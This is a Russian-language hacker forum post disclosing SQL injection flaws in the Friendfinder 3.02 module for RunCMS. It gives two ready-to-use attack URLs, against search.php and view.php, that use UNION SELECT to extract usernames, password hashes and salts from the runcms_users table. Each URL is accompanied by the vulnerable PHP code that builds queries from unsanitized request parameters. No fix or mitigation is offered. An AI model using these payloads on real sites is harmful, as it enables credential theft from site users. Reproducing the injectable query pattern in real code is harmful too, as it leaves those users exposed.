|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Friendfinder
Версия: 3.02
Уязвимый скрипт: search.php
Запрос: /modules/friendfinder/search.php?page=search&search=search&agefrom=77&ag etill=19+union+select+1,uname,pwdsalt,4,0x31322e31 322e31393939,pass+from+runcms_users%23&sex=&partne r=&state=&category=&sort=
Уязвимый кусок кода:
PHP код:
if ($page == search) {
if ($search == search) {
/************************/
$g="SUBSTRING(birth,7)";
$m="SUBSTRING(birth,4,2)";
$d="LEFT(birth,2)";
$dat="CONCAT($g,'.',$m,'.',$d)";
/************************/
$sql = "SELECT id,user, city, state, birth, title FROM ".$db->prefix("friendfinder")."
inner join ".$db->prefix("friendfinder_state")."
on state = cid
WHERE (DATE_FORMAT(FROM_DAYS(TO_DAYS(NOW())-TO_DAYS($dat)), '%Y')+0) BETWEEN $agefrom AND $agetill AND partner='$sex' AND sex='$partner' AND state='$state' AND active='1' AND category='$category' ORDER BY '$sort'";
} else {
echo ""._TEXTSEARCHUNSUCCESSFUL."";
}
echo "<table border=0 cellpadding=5 cellspacing=0 align=center width=550><tr><td><font face=arial size=2>"._UNAME."</td><br><td><font face=arial size=2>"._TEXTREGION."</td><td><font face=arial size=2>"._CITY."</td><td><font face=arial size=2>"._TEXTAGE."</td></tr>";
$result = $db->query($sql);
while (list($id,$user,$city,$state,$birth,$title ) = $db->fetch_row($result))
{
Уязвимый скрипт: view.php
Зависимость: magic_quotes = off
Запрос: /modules/friendfinder/view.php?id=-1'+union+select+1,uname,3,4,5,pass,7,8,9,pwdsalt,1 1,12,13,14,0x31322e31322e31393939,16,17,19,20,21,2 2+from+runcms_users%23
Уязвимый кусок кода:
PHP код:
if (isset($id) || $id != "")
{
$view = $db->query("SELECT id,user,active,sex,category,name,email,city,state,country,hobby,partner,height,weight,birth,pic,Description,imgname,imgtime,date, title FROM ".$db->prefix("friendfinder")."
inner join ".$db->prefix("friendfinder_state")." on state = cid WHERE id = '$id'");
while (list($id,$user,$active,$sex,$category,$name,$email,$city,$state,$country,$hobby,$partner,$height,$weight,$birth,$pic,$Description,$imgname,$imgtime,$date,$title ) = $db->fetch_row($view)) {
|